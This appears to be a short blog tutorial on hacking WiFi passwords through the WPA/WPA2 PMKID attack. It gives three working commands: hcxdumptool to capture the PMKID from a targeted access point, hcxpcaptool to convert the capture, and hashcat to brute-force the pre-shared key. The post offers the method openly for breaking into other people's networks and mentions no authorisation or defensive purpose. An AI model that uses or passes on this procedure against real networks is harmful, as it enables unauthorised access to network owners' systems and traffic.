Sunday, January 6, 2019

How to Hack WiFi Password Easily Using New Attack On WPA/WPA2 | Step-by-Step

Hi guys!

                        Have you been searching for how to hack wifi password using new attack, If yes then you are on right place.






Let's get started without wasting any time.


Just follow the steps:


Step 1 — An attacker can use a tool, like hcxdumptool (v4.2.0 or higher), to request the PMKID from the targeted access point and dump the received frame to a file.


$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

Step 2 — Using the hcxpcaptool tool, the output (in pcapng format) of the frame can then be converted into a hash format accepted by Hashcat.

$ ./hcxpcaptool -z test.16800 test.pcapng

Step 3 — Use Hashcat (v4.2.0 or higher) password cracking tool to obtain the WPA PSK (Pre-Shared Key) password, and bingo, that's how to hack wifi password.


$ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

That's the password of the target wireless network, cracking which may take time depending on its length and complexity.


That's it you have done.


###: If this method doesn't work for you try another method explained in another article on this blog.


Study our other informational posts.

Join this weblog through e-mail.

Thanks for giving your treasured time !

Hold on journeying.

Related Posts